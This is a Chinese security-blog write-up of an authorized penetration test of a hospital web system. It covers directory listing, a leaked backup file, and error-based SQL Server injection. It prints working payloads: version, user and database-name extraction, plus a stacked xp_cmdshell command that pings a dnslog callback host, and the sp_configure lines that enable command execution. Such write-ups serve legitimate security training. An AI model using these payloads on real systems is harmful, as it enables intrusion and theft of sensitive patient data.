freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

一次授权的未授权漏洞验证测试
2023-04-21 13:28:58
所属地 山东省

0x01背景

接到一个项目工单,需要对某医院系统进行一次授权验证测试项目,客户目前提供了远程桌面连接地址和被测系统URL,密码还在申请中。

0x02信息收集

出于测试习惯,打开页面后先开始一个初始的信息收集,首先根据框架和扫描端口得到几个简单信息:

1.Net开发的系统
2.IIS中间件框架
3.Windows Server服务器
4.开放了数据库端口1433,SQLServer数据库
5.存在用户名枚举问题
6.没有验证码机制

图片

开始对收集到的信息进行相关漏洞验证,首先看看有没有使用ueditor富文本编辑器,这块我是用的Tide知识星球里小伙伴发的攻防演练期间收集的列表进行目录爆破

图片

用DirBuster加载字典爆破未遂

图片

随后,对web应用和SqlServer数据库进行口令猜解均未遂。

图片

开始对中间件下手,对目标进行Options请求,发现目标既没开PUT请求方式又非可利用的中间件版本

图片

进行目录穿越测试的时候发现存在IIS目录浏览问题,看到hisxxxx.bak就兴奋了

图片

把压缩包文件下载到远程桌面后进行翻阅,按照常规找到web.config

图片

存在数据库的加密信息,之前见过Web.config SqlServer连接串解密的方法,但是受限于远程主机环境,无法进行解密操作。

图片

继续翻阅压缩包文件,发现了一个url地址信息

图片

打开后发现是一个医院xx系统,系统自带一个导航栏目,看起来像极了存在未授权访问漏洞的样子

![图片](data:image/svg+xml,%3C%3Fxml version='1.0' encoding='UTF-8'%3F%3E%3Csvg width='1px' height='1px' viewBox='0 0 1 1' version='1.1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'%3E%3Ctitle%3E%3C/title%3E%3Cg stroke='none' stroke-width='1' fill='none' fill-rule='evenodd' fill-opacity='0'%3E%3Cg transform='translate(-249.000000, -126.000000)' fill='%23FFFFFF'%3E%3Crect x='249' y='126' width='1' height='1'%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E)

0x03开始测试

功能还是挺多的,经过一番乱点,找到了几个查询页面,想用sqlmap跑一下,遇到系统环境问题,用了一段时间查询各种方法,没能解决。

![图片](data:image/svg+xml,%3C%3Fxml version='1.0' encoding='UTF-8'%3F%3E%3Csvg width='1px' height='1px' viewBox='0 0 1 1' version='1.1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'%3E%3Ctitle%3E%3C/title%3E%3Cg stroke='none' stroke-width='1' fill='none' fill-rule='evenodd' fill-opacity='0'%3E%3Cg transform='translate(-249.000000, -126.000000)' fill='%23FFFFFF'%3E%3Crect x='249' y='126' width='1' height='1'%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E)

遂尝试手动注入,由于攻防演练的快节奏,正常情况能用工具跑就不会用手工的坏毛病导致手动sql注入忘的差不多了,借此机会回忆一下

经过一番尝试,终于看到了曙光,报错注入

图片

测试发现直接构造查询语句,直接返回400,通过fuzz,发现简单url编码一下就可以执行注入语句

查看一下数据库版本,@@version是mssql的全局变量,如果写成这样and @@version>0 那个后面的mssql就会强行把@@version强行转换成int类型与0比大小,但是失败,所以就会将数据库版本信息暴露出来

1' or @@version>0--

图片

查一下当前连接数据库的用户,如果看到dbo转换类型识别,当前数据库的用户大概率是dba权限。

1' or User_Name()>0--

图片

查询当前数据库名称

先查一下数据库名称,没什么问题,但这样从库-表-字段-数据手工确实有点费劲,花费了大量时间查询,发现表有点多,这里就不再贴图了,下面直接尝试写shell试试

1' or db_name()>0-

图片

现在想要写shell了,sqlserver支持堆叠注入,现在还需要一个网站路径,aspx通过报错还是比较好找路径的,我们构造一个错误语句,得到一个web路径

图片

执行ping命令,dnslog平台查看一下有无回显

' ;exec master..xp_cmdshell "ping ph3owt.dnslog.cn -n 2" --

先不提出不出网这回事,xp_cmdshell是关闭的

图片

然而由于某不知名抗力,开启允许编辑高级选项和开启cmdshell竟然失败了

开启xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
开启允许编辑高级选项
EXEC sp_configure 'show advanced options', 1;

0x04 峰回路转

sql注入获取shell失败了,只能继续查看导航中页面,翻阅各种加载的js文件,一个个页面的源码查找。

在无意间发现在一个非常不起眼的页面的页面返回包中竟然有那种东西()

图片

虽然口口声声说着我没有权限

图片

下方却有一串注释了的h*s明文数据库用户名密码连接信息,我虽然不懂为什么 但我大受震撼

图片

后面直接上攻防演练数据库操作神器,一键getshell。

图片图片

0x05 小结

由于目前各行业信息系统随着攻防演练的推进,安全性在不断地提升,根据近期攻防演练情况来看,常规的弱口令及文件上传等手段获取权限相比以往困难了许多,所以更需要我们去注意一些细节,比如一些js、css、api接口、静态页面源码等平时不太注意的位置,可能会有惊喜出现。

认真去对待每一次日常的测试工作,对于测试的细粒度进行严格要求,持之以恒,定会有更大的收获。

# 未授权漏洞
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录